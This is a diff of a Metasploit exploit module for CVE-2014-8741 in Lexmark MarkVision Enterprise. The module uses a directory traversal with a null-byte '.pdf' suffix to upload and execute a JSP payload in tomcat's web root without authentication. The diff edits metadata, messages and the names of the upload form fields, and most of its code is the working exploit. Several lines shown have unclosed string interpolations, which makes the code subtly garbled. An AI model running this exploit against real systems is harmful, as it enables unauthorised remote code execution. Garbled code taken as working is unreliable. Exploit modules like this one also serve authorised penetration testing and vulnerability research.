@@ -15,10 +15,9 @@ def initialize(info = {})
1515 super ( update_info ( info ,
1616 'Name' => 'Lexmark MarkVision Enterprise Arbitrary File Upload' ,
1717 'Description' => %q{
18- This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1. A
19- directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated attacker
20- to upload arbitrary files. Since the embedded tomcat application server enables auto deploy
21- it's possible to upload a WAR file to achieve remote code execution. This module has been
18+ This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1.
19+ A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated
20+ attacker to upload arbitrary files, including arbitrary JSP code. This module has been
2221 tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.
2322 } ,
2423 'Author' =>
@@ -30,7 +29,8 @@ def initialize(info = {})
3029 'References' =>
3130 [
3231 [ 'CVE' , '2014-8741' ] ,
33- [ 'ZDI' , '14-410' ]
32+ [ 'ZDI' , '14-410' ] ,
33+ [ 'URL' , 'http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US' ]
3434 ] ,
3535 'Privileged' => true ,
3636 'Platform' => 'win' ,
@@ -40,7 +40,7 @@ def initialize(info = {})
4040 [ 'Lexmark Markvision Enterprise 2.0' , { } ]
4141 ] ,
4242 'DefaultTarget' => 0 ,
43- 'DisclosureDate' => 'Jan 17 2012 ' ) )
43+ 'DisclosureDate' => 'Dec 09 2014 ' ) )
4444
4545 register_options (
4646 [
@@ -70,16 +70,16 @@ def check
7070
7171 def exploit
7272 jsp_leak = jsp_path
73- jsp_name_leak = "#{ rand_text_alphanumeric ( 4 + rand ( 32 - 4 ) ) }
73+ jsp_name_leak = "#{ rand_text_alphanumeric ( 4 + rand ( 32 - 4 ) ) }
7474 # By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled
7575 # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT
7676 traversal_leak = "/..\\ ..\\ ..\\ tomcat\\ webapps\\ ROOT\\ #{ jsp_name_leak } \x00 .pdf"
7777
7878 print_status ( "#{ peer } #{ jsp_name_leak } )
7979 if upload_file ( traversal_leak , jsp_leak )
80- print_good ( "#{ peer } updated " )
80+ print_good ( "#{ peer } uploaded " )
8181 else
82- fail_with ( Failure ::Unknown , "#{ peer } update failed" )
82+ fail_with ( Failure ::Unknown , "#{ peer } upload failed" )
8383 end
8484
8585 res = execute ( jsp_name_leak )
@@ -96,12 +96,12 @@ def exploit
9696 jsp_payload = payload . encoded
9797 traversal_payload = "/..\\ ..\\ ..\\ tomcat\\ webapps\\ ROOT\\ #{ jsp_payload_name } \x00 .pdf"
9898
99- print_status ( "#{ peer } )
99+ print_status ( "#{ peer } #{ jsp_payload_name } )
100100 if upload_file ( traversal_payload , jsp_payload )
101- print_good ( "#{ peer } updated " )
102- register_file_for_cleanup ( ::File . join ( upload_path , 'webapps' , 'ROOT' , jsp_payload_name ) )
101+ print_good ( "#{ peer } uploaded " )
102+ register_file_for_cleanup ( ::File . join ( upload_path , 'webapps' , 'ROOT' , jsp_payload_name ) ) if upload_path
103103 else
104- fail_with ( Failure ::Unknown , "#{ peer } update failed" )
104+ fail_with ( Failure ::Unknown , "#{ peer } upload failed" )
105105 end
106106
107107 print_status ( "#{ peer } )
@@ -113,9 +113,9 @@ def upload_file(filename, contents)
113113 bad_signature = rand_text_alpha ( 4 + rand ( 4 ) )
114114
115115 post_data = Rex ::MIME ::Message . new
116- post_data . add_part ( good_signature , nil , nil , " form-data; name=\ "\" " )
117- post_data . add_part ( bad_signature , nil , nil , " form-data; name=\ "\" " )
118- post_data . add_part ( contents , " application/octet-stream" , nil , "form-data; name=\" datafile\" ; filename=\" #{ filename } \" " )
116+ post_data . add_part ( good_signature , nil , nil , ' form-data; name="success"' )
117+ post_data . add_part ( bad_signature , nil , nil , ' form-data; name="failure"' )
118+ post_data . add_part ( contents , ' application/octet-stream' , nil , "form-data; name=\" datafile\" ; filename=\" #{ filename } \" " )
119119
120120 res = send_request_cgi (
121121 {
0 commit comments